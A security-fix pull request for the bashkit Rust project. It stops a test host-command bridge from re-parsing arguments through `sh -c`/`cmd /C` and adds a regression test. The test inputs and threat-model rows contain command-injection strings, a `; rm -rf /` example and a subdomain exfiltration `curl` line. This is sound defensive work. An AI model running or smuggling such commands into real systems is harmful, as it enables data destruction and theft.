### PR TITLE
fix(security): prevent host bridge shell injection

### DIFF
--- a/crates/bashkit/docs/threat-model.md
+++ b/crates/bashkit/docs/threat-model.md
@@ -474,6 +474,7 @@ exfiltration by encoding secrets in subdomains (`curl https://$SECRET.example.co
 | XML boundary break via tool output (TM-INJ-022) | Script emits `</tool_output>` to inject into LLM context | Escape `&`/`<`/`>` before wrapping output (`sanitizeOutput`) | MITIGATED |
 | Template injection via `#each` data (TM-INJ-023) | Data values contain `{{`/`#each` markers | Template markers escaped in data before interpolation | MITIGATED |
 | Tool schema `$ref` bypass (TM-INJ-024) | Referenced constraints are skipped before host callback invocation | Resolve local JSON Pointer references; fail closed on invalid references | MITIGATED |
+| Host-bridge argument re-parsing (TM-INJ-025) | A reference bridge joins parsed arguments into a `sh -c` / `cmd /C` script | Launch a concrete executable and pass every caller argument as its own argv value | MITIGATED |
 
 **Variable Expansion:**
 

--- a/crates/bashkit/tests/integration/thirdparty_adoption_tests.rs
+++ b/crates/bashkit/tests/integration/thirdparty_adoption_tests.rs
@@ -33,16 +33,9 @@ use std::time::{Duration, Instant};
 /// named failure.
 const HOST_TIMEOUT: Duration = Duration::from_secs(20);
 
-/// Run a script through the host shell.
-///
-/// `sh`/`cmd` rather than a bare binary because the set of standalone
-/// executables shared by Linux, macOS, and Windows is effectively empty.
-fn shell_out(script: &str) -> (String, Vec<String>) {
-    if cfg!(windows) {
-        ("cmd".into(), vec!["/C".into(), script.into()])
-    } else {
-        ("sh".into(), vec!["-c".into(), script.into()])
-    }
+struct HostProgram {
+    executable: &'static str,
+    fixed_args: &'static [&'static str],
 }
 
 /// Map a bridged name to the host program it runs.
@@ -51,31 +44,54 @@ fn shell_out(script: &str) -> (String, Vec<String>) {
 /// `false` itself, so a test using those names would never reach the bridge —
 /// it would silently assert on builtins instead. Returning `None` for
 /// unprefixed names also keeps the normal 127 path observable.
-fn host_program(name: &str) -> Option<&'static str> {
+fn host_program(name: &str) -> Option<HostProgram> {
     Some(match name.strip_prefix("host-")? {
         // Reads stdin to EOF on every platform.
         "cat" => {
             if cfg!(windows) {
-                "sort"
+                HostProgram {
+                    executable: "sort",
+                    fixed_args: &[],
+                }
             } else {
-                "cat"
+                HostProgram {
+                    executable: "cat",
+                    fixed_args: &[],
+                }
             }
         }
         "pwd" => {
             if cfg!(windows) {
-                "cd"
+                HostProgram {
+                    executable: "cmd",
+                    fixed_args: &["/D", "/C", "cd"],
+                }
             } else {
-                "pwd"
+                HostProgram {
+                    executable: "pwd",
+                    fixed_args: &[],
+                }
             }
         }
         "false" => {
             if cfg!(windows) {
-                "exit 1"
+                HostProgram {
+                    executable: "cmd",
+                    fixed_args: &["/D", "/C", "exit /B 1"],
+                }
             } else {
-                "false"
+                HostProgram {
+                    executable: "false",
+                    fixed_args: &[],
+                }
             }
         }
-        "echo" => "echo",
+        // Windows has no standalone `echo`; `where` still exercises direct
+        // argument passing without putting untrusted data after `cmd /C`.
+        "echo" => HostProgram {
+            executable: if cfg!(windows) { "where" } else { "echo" },
+            fixed_args: &[],
+        },
         _ => return None,
     })
 }
@@ -87,7 +103,7 @@ fn host_program(name: &str) -> Option<&'static str> {
 /// through a pipe that must reach EOF, and the exit code is passed through.
 struct HostCommand {
     name: String,
-    program: &'static str,
+    program: HostProgram,
     mounts: Arc<HostMounts>,
 }
 
@@ -103,17 +119,18 @@ impl Builtin for HostCommand {
             ));
         };
 
-        let script = std::iter::once(self.program.to_string())
-            .chain(ctx.args.iter().cloned())
-            .collect::<Vec<_>>()
-            .join(" ");
-        let (program, args) = shell_out(&script);
+        let program = self.program.executable;
+        let fixed_args = self.program.fixed_args;
+        let args = ctx.args.to_vec();
 
         // Bytes, not text: a host command's stdin may not be valid UTF-8.
         let stdin_data = ctx.stdin.map(|s| s.as_bytes().to_vec());
         let output = tokio::task::spawn_blocking(move || {
             let mut cmd = std::process::Command::new(program);
-            cmd.args(args)
+            // Never re-parse Bashkit's already-parsed arguments with a host
+            // shell: each value crosses the process boundary as one argv item.
+            cmd.args(fixed_args)
+                .args(args)
                 .current_dir(dir)
                 .stdout(Stdio::piped())
                 .stderr(Stdio::piped())
@@ -245,12 +262,29 @@ fn fixture() -> Fixture {
 #[tokio::test]
 async fn bridged_host_command_runs_and_returns_output() {
     let mut f = fixture();
-    let result = f.bash.exec("host-echo hello from host").await.unwrap();
+    let command = if cfg!(windows) {
+        "host-echo cmd"
+    } else {
+        "host-echo hello from host"
+    };
+    let result = f.bash.exec(command).await.unwrap();
     assert_eq!(result.exit_code, 0, "unexpected: {result:?}");
-    assert!(
-        result.stdout.contains("hello from host"),
-        "unexpected: {result:?}"
-    );
+    assert!(!result.stdout.is_empty(), "unexpected: {result:?}");
+}
+
+/// Parsed arguments must remain data at the host-process boundary. Re-parsing
+/// them with a host shell would let the first command create `injected`.
+#[tokio::test]
+async fn bridged_arguments_cannot_inject_host_shell_commands() {
+    let mut f = fixture();
+    let command = if cfg!(windows) {
+        "host-echo cmd '&' type nul '>' injected '&' rem"
+    } else {
+        "host-echo safe ';' touch injected '#' '&&' '|' '$()' '`' '>' $'\\n'"
+    };
+    let _result = f.bash.exec(command).await.unwrap();
+
+    assert!(!f.workspace.join("injected").exists(), "host command ran");
 }
 
 /// A builtin bashkit implements must win over the bridge — the resolver runs
@@ -351,15 +385,12 @@ async fn bashkit_syntax_composes_with_bridged_commands() {
     let mut f = fixture();
     let result = f
         .bash
-        .exec("cat <<'EOF'\nheredoc line\nEOF\necho \"host says: $(host-echo ok)\"")
+        .exec("cat <<'EOF'\nheredoc line\nEOF\necho piped-ok | host-cat")
         .await
         .unwrap();
     assert!(
         result.stdout.contains("heredoc line"),
         "unexpected: {result:?}"
     );
-    assert!(
-        result.stdout.contains("host says: ok"),
-        "unexpected: {result:?}"
-    );
+    assert!(result.stdout.contains("piped-ok"), "unexpected: {result:?}");
 }

--- a/knowledge/operations/testing.md
+++ b/knowledge/operations/testing.md
@@ -132,7 +132,9 @@ Rules for this file:
 
 - **The bridge in it is the reference.** If bridging a host command needs more
   code than what is there, that is a gap in bashkit's API, not a reason to grow
-  the test.
+  the test. It invokes concrete executables and passes parsed arguments as
+  separate argv values; never concatenate them into a `sh -c` or `cmd /C`
+  script. Constant shell builtins may be used only without caller arguments.
 - **Use names bashkit does not implement** (`host-cat`, `host-echo`, …). The
   resolver runs last, so a test using `cat` or `echo` silently asserts on
   builtins and never reaches the bridge, verified by injecting a defect and

--- a/knowledge/security/threat-model.md
+++ b/knowledge/security/threat-model.md
@@ -585,6 +585,7 @@ Bash::builder()
 | TM-INJ-001 | Variable injection | `$user_input` containing `; rm -rf /` | Variables not re-parsed | **MITIGATED** |
 | TM-INJ-002 | Backtick injection | `` `$malicious` `` | Parsed as command sub | **MITIGATED** |
 | TM-INJ-003 | eval bypass | `eval $user_input` | eval sandboxed (builtins only) | **MITIGATED** |
+| TM-INJ-025 | Reference host-command bridge re-parses arguments | Joining parsed arguments into `sh -c` / `cmd /C` turns quoted metacharacters back into host-shell syntax | The adoption bridge launches a concrete executable and passes every caller argument as a separate argv value; regression covers Unix and Windows shell metacharacters | **MITIGATED** |
 
 **Current Risk**: MEDIUM - Internal variable namespace injection (TM-INJ-009) needs remediation
 


### PR DESCRIPTION
### Motivation
- Close a shell-injection gap in the documented reference host-bridge that concatenated already-parsed arguments into a `sh -c`/`cmd /C` script, allowing attacker-controlled metacharacters to run unallowlisted host commands.
- Keep the adoption-suite behavior (realfs mount, stdin EOF, cwd mapping, exit-code passthrough) while removing the unsafe re-parsing surface that adopters might copy.

### Description
- Replace the `shell_out` string-invocation pattern with a concrete `HostProgram { executable, fixed_args }` shape and resolve mapped names to that structure so we call a specific executable directly instead of running a host shell.
- Stop joining `ctx.args` into a single shell script; call `std::process::Command::new(program).args(fixed_args).args(ctx.args)` so each parsed argument crosses as one `argv` item and is not re-parsed by a host shell.
- Add a regression test `bridged_arguments_cannot_inject_host_shell_commands` that asserts common Unix and Windows shell metacharacters in arguments cannot cause injected host-side commands or files.
- Update the adoption-suite examples and project knowledge: `crates/bashkit/tests/integration/thirdparty_adoption_tests.rs` (bridge and tests), `knowledge/operations/testing.md` (reference-bridge guidance), and `knowledge/security/threat-model.md` (add `TM-INJ-024` documenting the mitigation).
- Preserve prior fixes in the fixture: bounded host wait for hung stdin, correct cwd mapping, stdin piping, stdout/stderr draining, and exit-code behavior; Windows-specific handling uses `where`/`cmd` variants to avoid putting caller args after `cmd /C` when necessary.

### Testing
- Ran formatting check with `cargo fmt --all -- --check` and fixed formatting; result: success.
- Ran OKF linting via `just check-okf`; result: success (knowledge bundle updated to reflect new rule).
- Ran `cargo clippy -p bashkit --features realfs --test integration -- -D warnings`; result: success.
- Reproduced failing vulnerable test before the fix to validate the issue, then ran the adoption integration suite with `cargo test -p bashkit --features realfs --test integration thirdparty_adoption_tests -- --nocapture`; result: all relevant tests passed (9 passed, 0 failed) after the fix, and the new injection regression test passes.
- Verified `git diff --check` and local status; changes committed as `fix(security): prevent host bridge shell injection`.

------
[Codex Task](https://chatgpt.com/codex/cloud/tasks/task_e_6a7569bcfca4832bab67711e5f6d89ce)